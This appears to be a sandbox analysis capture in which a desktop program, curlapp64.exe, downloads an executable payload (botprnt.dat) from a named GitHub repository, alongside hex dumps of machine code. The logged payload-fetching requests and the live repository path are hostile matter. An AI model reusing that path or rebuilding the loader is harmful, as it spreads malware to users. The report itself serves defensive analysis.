                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: ff ff 88 45 f1 0f b6 45 f2 0f b6 c0 89 c1 e8 99 fc ff ff 88 45 f2 0f b6 55 ef 8b 45 fc c1 e8 02 89 c1 48 8d 05 33 0b e7 00 0f b6 04 01 31 d0 88 45 ef 8b 45 fc c1 e0 02 89 45 f8 8b 45 fc 83 e8 04 c1 e0 02 89 45 f4 8b 45 f4 48 8b 55 10 48 01 d0 44 0f b6 00 0f b6 4d ef 8b 45 f8 48 8b 55 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 01 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f0 8b 45 f8 83 c0 01 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 02 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f1 8b 45 f8 83 c0 02 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 03 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f2 8b 45 f8 83 c0 03 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 83 45 fc 01 83 7d fc 2b 0f 86 47 fe ff ff
                                                                                                                                                                                                Data Ascii: EEEUEH31EEEEEEHUHDMEHUHD1EHEHDMEHEHD1EHEHDMEHEHD1EHEHDMEHEHD1E}+G
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 89 d0 48 89 c2 b9 0a 00 00 00 e8 ed fb ff ff c6 45 ff 09 48 8b 45 10 48 89 c1 e8 87 fc ff ff 48 8b 45 10 48 89 c1 e8 5e fd ff ff 0f b6 45 ff 48 8b 4d 18 48 8b 55 10 49 89 c8 89 c1 e8 bb fb ff ff 80 7d ff 00 74 12 48 8b 45 10 48 89 c1 e8 b8 fd ff ff 80 6d ff 01 eb ba 90 90 48 83 c4 30 5d c3 55 56 53 48 83 ec 30 48 8d 6c 24 30 48 89 4d 20 c6 45 ff 00 eb 5c c6 45 fe 00 eb 4c 0f b6 45 fe 0f b6 55 ff 48 8b 4d 20 48 63 d2 48 98 48 c1 e0 02 48 01 c8 48 01 d0 0f b6 00 0f b6 c0 0f b6 5d fe 0f b6 75 ff 89 c1 e8 9d f6 ff ff 89 c2 4c 8b 45 20 48 63 ce 48 63 c3 48 c1 e0 02 4c 01 c0 48 01 c8 88 10 80 45 fe 01 80 7d fe 03 76 ae 80 45 ff 01 80 7d ff 03 76 9e 90 90 48 83 c4 30 5b 5e 5d c3 55 48 89 e5 48 83 ec 10 48 89 4d 10 48 8b 45 10 0f b6 40 01 88 45 ff 48 8b 45 10 0f
                                                                                                                                                                                                Data Ascii: HEHEHHEH^EHMHUI}tHEHmH0]UVSH0Hl$0HM E\ELEUHM HcHHHH]uLE HcHcHLHE}vE}vH0[^]UHHHMHE@EHE
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 00 00 48 8b 45 18 48 89 c1 e8 35 f6 ff ff 48 8b 45 10 48 8d 88 b0 00 00 00 48 8d 45 e0 41 b8 10 00 00 00 48 89 c2 e8 06 f3 ff ff 48 83 45 18 10 48 83 45 f8 10 48 8b 45 f8 48 3b 45 20 72 92 90 90 48 83 c4 40 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 48 89 55 18 4c 89 45 20 48 83 7d 10 00 0f 84 ad 00 00 00 48 8b 45 10 48 8b 40 08 48 85 c0 0f 85 9c 00 00 00 48 83 7d 20 00 0f 84 91 00 00 00 48 8b 45 20 48 83 c0 01 01 c0 66 89 45 fe 0f b7 45 fe 48 89 c1 e8 54 2c 00 00 48 89 c2 48 8b 45 10 48 89 50 08 48 8b 45 10 48 8b 40 08 48 85 c0 75 07 b8 ff ff ff ff eb 5d 0f b7 55 fe 48 8b 45 10 48 8b 40 08 49 89 d0 ba 00 00 00 00 48 89 c1 e8 21 2b 00 00 0f b7 4d fe 48 8b 45 10 48 8b 40 08 48 8b 55 18 49 89 c8 48 89 c1 e8 d6 2b 00 00 0f b7 45 fe 8d 50 fe 48 8b 45 10 66 89
                                                                                                                                                                                                Data Ascii: HEH5HEHHEAHHEHEHEH;E rH@]UHH0HMHULE H}HEH@HH} HE HfEEHT,HHEHPHEH@Hu]UHEH@IH!+MHEH@HUIH+EPHEf
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: c7 85 34 01 00 00 30 00 00 00 8b 85 34 01 00 00 65 48 8b 00 48 89 85 28 01 00 00 48 8b 85 28 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 88 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 4c 8b 0d f8 28 e7 00 c7 85 24 01 00 00 30 00 00 00 8b 85 24 01 00 00 65 48 8b 00 48 89 85 18 01 00 00 48 8b 85 18 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 90 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 c2 28 e7 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 e9 f3 04 00 00 4c 8b 0d 8c 28 e7 00 c7 85 14 01 00 00 30 00 00 00 8b 85 14 01 00 00 65 48 8b 00 48 89 85 08 01 00 00 48 8b 85 08 01 00 00 48 8b 40 60 48 8b 40 30 41 b8 c8 00 00 00 ba 08 00 00 00 48 89 c1 41 ff d1 48 89 85 78 01 00 00 48 83 bd 78 01 00 00 00 0f 85 f0 00 00 00 4c 8b 0d 3d 28
                                                                                                                                                                                                Data Ascii: 404eHH(H(H@`H@0HIHAL($0$eHHHH@`H@0HIHAH(HHL(0eHHHH@`H@0AHAHxHxL=(
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 40 60 48 8b 40 30 48 8b 95 80 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 ca 23 e7 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 48 81 c4 28 02 00 00 5f 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 c7 45 fc 00 00 00 00 48 c7 45 f0 00 00 00 00 48 8b 05 94 23 e7 00 48 8d 55 f0 48 8b 4d 10 49 89 d1 49 89 c8 ba 00 00 00 00 b9 00 00 00 00 ff d0 89 45 fc 83 7d fc 00 78 15 48 8b 15 72 23 e7 00 48 8b 45 f0 48 89 c1 ff d2 8b 45 fc eb 03 8b 45 fc 48 83 c4 30 5d c3 55 48 81 ec 60 02 00 00 48 8d ac 24 80 00 00 00 48 89 8d f0 01 00 00 c7 85 bc 01 00 00 60 00 00 00 8b 85 bc 01 00 00 65 48 8b 00 48 89 85 b0 01 00 00 48 8b 85 b0 01 00 00 48 89 85 c8 01 00 00 48 8b 85 c8 01 00 00 48 8b 40 18 48 89 85 c0 01 00 00 48 8b 85 c0 01 00 00 48 8b 40 20 48
                                                                                                                                                                                                Data Ascii: @`H@0HIHAH#HHH(_]UHH0HMEHEH#HUHMIIE}xHr#HEHEEH0]UH`H$H`eHHHHHH@HHH@ H
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 00 4c 8d 05 8a f0 e6 00 ba 10 00 00 00 48 8d 05 1e 2f 00 00 48 89 c1 e8 36 1e 00 00 48 8d 85 90 02 00 00 48 89 c1 e8 14 fb ff ff 48 89 85 c8 02 00 00 48 83 bd c8 02 00 00 00 75 0a b8 ff ff ff ff e9 04 07 00 00 48 c7 85 60 02 00 00 00 00 00 00 48 c7 85 68 02 00 00 00 00 00 00 48 c7 85 70 02 00 00 00 00 00 00 48 c7 85 78 02 00 00 00 00 00 00 48 c7 85 80 02 00 00 00 00 00 00 48 c7 44 24 28 09 00 00 00 48 8d 85 60 02 00 00 48 89 44 24 20 4c 8d 0d 79 f0 e6 00 4c 8d 05 52 f0 e6 00 ba 10 00 00 00 48 8d 05 96 2e 00 00 48 89 c1 e8 9e 1d 00 00 48 8d 85 60 02 00 00 48 89 c1 e8 7c fa ff ff 48 89 85 c0 02 00 00 48 83 bd c0 02 00 00 00 75 0a b8 ff ff ff ff e9 6c 06 00 00 48 c7 85 53 02 00 00 00 00 00 00 48 c7 85 58 02 00 00 00 00 00 00 48 c7 85 47 02 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: LH/H6HHHHuH`HhHpHxHHD$(H`HD$ LyLRH.HH`H|HHulHSHXHG
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 30 02 00 00 48 89 50 08 48 8b 15 02 f5 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 10 02 00 00 48 89 50 08 48 8b 15 ba f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 08 02 00 00 48 89 50 08 48 8b 15 62 f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 f0 01 00 00 48 89 50 08 48 8b 15 5a f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 01 00 00 00 48 8d 95 d0 01 00 00 48 89 50 08 48 8b 15 52 f4 e6 00 48 89 50 10 48 c7 40 18 00 00 00 00 48 83 c0 20 c7 00 00 00 00 00 48 8d 95 c0 01 00 00 48 89 50 08 48 c7 40 10 00 00 00 00 48 8d 15 22 18 e7 00 48 89 50 18 48 83 c0 20 c7 00 00 00 00 00 48 8d 95
                                                                                                                                                                                                Data Ascii: H H0HPHHPH@H HHPHHPH@H HHPHbHPH@H HHPHZHPH@H HHPHRHPH@H HHPH@H"HPH H
                                                                                                                                                                                                2024-11-05 09:46:22 UTC1378INData Raw: 91 e6 ff ff 89 85 5c 06 00 00 83 bd 5c 06 00 00 00 78 26 48 8d 85 10 06 00 00 48 89 c1 e8 f6 ef ff ff ba d8 0e 00 00 b9 4c 04 00 00 e8 4d 14 00 00 48 89 c1 e8 a5 14 00 00 48 8d 85 10 06 00 00 48 89 c1 e8 ec e5 ff ff 48 8d 85 00 06 00 00 48 89 c1 e8 dd e5 ff ff eb 01 90 48 81 c4 e8 06 00 00 5f 5d c3 55 48 89 e5 48 89 4d 10 89 55 18 4c 89 45 20 b8 01 00 00 00 5d c3 90 90 90 90 49 89 ca 8b 05 87 db e6 00 0f 05 c3 49 89 ca 8b 05 7f db e6 00 0f 05 c3 49 89 ca 8b 05 77 db e6 00 0f 05 c3 49 89 ca 8b 05 6f db e6 00 0f 05 c3 49 89 ca 8b 05 6b db e6 00 0f 05 c3 49 89 ca 8b 05 5b db e6 00 0f 05 c3 49 89 ca 8b 05 57 db e6 00 0f 05 c3 66 2e 0f 1f 84 00 00 00 00 00 66 90 48 83 ec 28 48 8b 05 45 db e6 00 48 8b 00 48 85 c0 74 22 0f 1f 44 00 00 ff d0 48 8b 05 2f db e6 00
                                                                                                                                                                                                Data Ascii: \\x&HHLMHHHHHH_]UHHMULE ]IIIwIoIkI[IWf.fH(HEHHt"DH/


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.552653140.82.121.44437096C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:28 UTC89OUTHEAD /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:28 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                                                Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:46:28 UTC3384INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.552665185.199.110.1334437096C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:28 UTC100OUTHEAD /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:29 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 15149056
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                ETag: "61c8fa303e2f0fb491ca9c63dfa1f4c2a4bf84b67e0dd41dcad04d02dc6078c1"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 3B8A:230C89:CD5FCD:E3E1EA:6729E95E
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:29 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-dfw-ktki8620028-DFW
                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1730799989.038425,VS0,VE1
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: e409a9f75b2fda500f0a7a3e3d8fb1923a80d2c8
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:51:29 GMT
                                                                                                                                                                                                Source-Age: 20


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.552671140.82.121.44437096C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:29 UTC88OUTGET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: github.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:30 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                                                Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                2024-11-05 09:46:30 UTC3384INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.552682185.199.110.1334437096C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-05 09:46:31 UTC99OUTGET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                2024-11-05 09:46:32 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 15149056
                                                                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                ETag: "61c8fa303e2f0fb491ca9c63dfa1f4c2a4bf84b67e0dd41dcad04d02dc6078c1"
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-GitHub-Request-Id: 3B8A:230C89:CD5FCD:E3E1EA:6729E95E
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Date: Tue, 05 Nov 2024 09:46:31 GMT
                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                X-Served-By: cache-dfw-kdal2120084-DFW
                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                X-Timer: S1730799992.746545,VS0,VE1
                                                                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                X-Fastly-Request-ID: 981d5c99458acc46310340064a6c875477594343
                                                                                                                                                                                                Expires: Tue, 05 Nov 2024 09:51:31 GMT
                                                                                                                                                                                                Source-Age: 23
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 68 d4 28 67 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 27 00 42 00 00 00 24 e7 00 00 02 00 00 20 13 00 00 00 10 00 00 00 00 85 45 03 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 e7 00 00 04 00 00 58 09 e8 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdh(g."'B$ EX`
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 00 00 00 eb 81 66 0f 1f 84 00 00 00 00 00 31 c0 48 87 03 eb 9c 66 0f 1f 84 00 00 00 00 00 48 8b 15 c9 1b e7 00 c7 06 01 00 00 00 48 8b 0d ac 1b e7 00 e8 9f 3c 00 00 e9 66 ff ff ff 66 90 48 8b 15 89 1b e7 00 48 8b 0d 72 1b e7 00 e8 85 3c 00 00 c7 06 02 00 00 00 e9 51 ff ff ff 66 90 b9 1f 00 00 00 e8 86 3a 00 00 e9 35 ff ff ff 90 41 54 55 57 56 53 48 83 ec 20 4c 8b 25 0f 1b e7 00 85 d2 48 89 ce 89 d3 41 89 14 24 4c 89 c7 75 47 8b 05 21 3e e7 00 85 c0 74 5f e8 d0 2e 00 00 49 89 f8 89 da 48 89 f1 e8 c9 2a 00 00 89 c5 85 db 0f 84 b1 00 00 00 83 fb 03 0f 84 a8 00 00 00 89 e8 41 c7 04 24 ff ff ff ff 48 83 c4 20 5b 5e 5f 5d 41 5c c3 0f 1f 00 e8 93 2e 00 00 8d 43 ff 49 89 f8 89 da 83 f8 01 48 89 f1 0f 87 a7 00 00 00 e8 ba fd ff ff 85 c0 75 06 31 ed eb c2 66 90 49
                                                                                                                                                                                                Data Ascii: f1HfHH<ffHHr<Qf:5ATUWVSH L%HA$LuG!>t_.IH*A$H [^_]A\.CIHu1fI
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: ff ff 88 45 f1 0f b6 45 f2 0f b6 c0 89 c1 e8 99 fc ff ff 88 45 f2 0f b6 55 ef 8b 45 fc c1 e8 02 89 c1 48 8d 05 33 0b e7 00 0f b6 04 01 31 d0 88 45 ef 8b 45 fc c1 e0 02 89 45 f8 8b 45 fc 83 e8 04 c1 e0 02 89 45 f4 8b 45 f4 48 8b 55 10 48 01 d0 44 0f b6 00 0f b6 4d ef 8b 45 f8 48 8b 55 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 01 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f0 8b 45 f8 83 c0 01 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 02 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f1 8b 45 f8 83 c0 02 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 03 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f2 8b 45 f8 83 c0 03 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 83 45 fc 01 83 7d fc 2b 0f 86 47 fe ff ff
                                                                                                                                                                                                Data Ascii: EEEUEH31EEEEEEHUHDMEHUHD1EHEHDMEHEHD1EHEHDMEHEHD1EHEHDMEHEHD1E}+G
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 89 d0 48 89 c2 b9 0a 00 00 00 e8 ed fb ff ff c6 45 ff 09 48 8b 45 10 48 89 c1 e8 87 fc ff ff 48 8b 45 10 48 89 c1 e8 5e fd ff ff 0f b6 45 ff 48 8b 4d 18 48 8b 55 10 49 89 c8 89 c1 e8 bb fb ff ff 80 7d ff 00 74 12 48 8b 45 10 48 89 c1 e8 b8 fd ff ff 80 6d ff 01 eb ba 90 90 48 83 c4 30 5d c3 55 56 53 48 83 ec 30 48 8d 6c 24 30 48 89 4d 20 c6 45 ff 00 eb 5c c6 45 fe 00 eb 4c 0f b6 45 fe 0f b6 55 ff 48 8b 4d 20 48 63 d2 48 98 48 c1 e0 02 48 01 c8 48 01 d0 0f b6 00 0f b6 c0 0f b6 5d fe 0f b6 75 ff 89 c1 e8 9d f6 ff ff 89 c2 4c 8b 45 20 48 63 ce 48 63 c3 48 c1 e0 02 4c 01 c0 48 01 c8 88 10 80 45 fe 01 80 7d fe 03 76 ae 80 45 ff 01 80 7d ff 03 76 9e 90 90 48 83 c4 30 5b 5e 5d c3 55 48 89 e5 48 83 ec 10 48 89 4d 10 48 8b 45 10 0f b6 40 01 88 45 ff 48 8b 45 10 0f
                                                                                                                                                                                                Data Ascii: HEHEHHEH^EHMHUI}tHEHmH0]UVSH0Hl$0HM E\ELEUHM HcHHHH]uLE HcHcHLHE}vE}vH0[^]UHHHMHE@EHE
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: 00 00 48 8b 45 18 48 89 c1 e8 35 f6 ff ff 48 8b 45 10 48 8d 88 b0 00 00 00 48 8d 45 e0 41 b8 10 00 00 00 48 89 c2 e8 06 f3 ff ff 48 83 45 18 10 48 83 45 f8 10 48 8b 45 f8 48 3b 45 20 72 92 90 90 48 83 c4 40 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 48 89 55 18 4c 89 45 20 48 83 7d 10 00 0f 84 ad 00 00 00 48 8b 45 10 48 8b 40 08 48 85 c0 0f 85 9c 00 00 00 48 83 7d 20 00 0f 84 91 00 00 00 48 8b 45 20 48 83 c0 01 01 c0 66 89 45 fe 0f b7 45 fe 48 89 c1 e8 54 2c 00 00 48 89 c2 48 8b 45 10 48 89 50 08 48 8b 45 10 48 8b 40 08 48 85 c0 75 07 b8 ff ff ff ff eb 5d 0f b7 55 fe 48 8b 45 10 48 8b 40 08 49 89 d0 ba 00 00 00 00 48 89 c1 e8 21 2b 00 00 0f b7 4d fe 48 8b 45 10 48 8b 40 08 48 8b 55 18 49 89 c8 48 89 c1 e8 d6 2b 00 00 0f b7 45 fe 8d 50 fe 48 8b 45 10 66 89
                                                                                                                                                                                                Data Ascii: HEH5HEHHEAHHEHEHEH;E rH@]UHH0HMHULE H}HEH@HH} HE HfEEHT,HHEHPHEH@Hu]UHEH@IH!+MHEH@HUIH+EPHEf
                                                                                                                                                                                                2024-11-05 09:46:32 UTC1378INData Raw: c7 85 34 01 00 00 30 00 00 00 8b 85 34 01 00 00 65 48 8b 00 48 89 85 28 01 00 00 48 8b 85 28 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 88 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 4c 8b 0d f8 28 e7 00 c7 85 24 01 00 00 30 00 00 00 8b 85 24 01 00 00 65 48 8b 00 48 89 85 18 01 00 00 48 8b 85 18 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 90 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 c2 28 e7 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 e9 f3 04 00 00 4c 8b 0d 8c 28 e7 00 c7 85 14 01 00 00 30 00 00 00 8b 85 14 01 00 00 65 48 8b 00 48 89 85 08 01 00 00 48 8b 85 08 01 00 00 48 8b 40 60 48 8b 40 30 41 b8 c8 00 00 00 ba 08 00 00 00 48 89 c1 41 ff d1 48 89 85 78 01 00 00 48 83 bd 78 01 00 00 00 0f 85 f0 00 00 00 4c 8b 0d 3d 28
                                                                                                                                                                                                Data Ascii: 404eHH(H(H@`H@0HIHAL($0$eHHHH@`H@0HIHAH(HHL(0eHHHH@`H@0AHAHxHxL=(
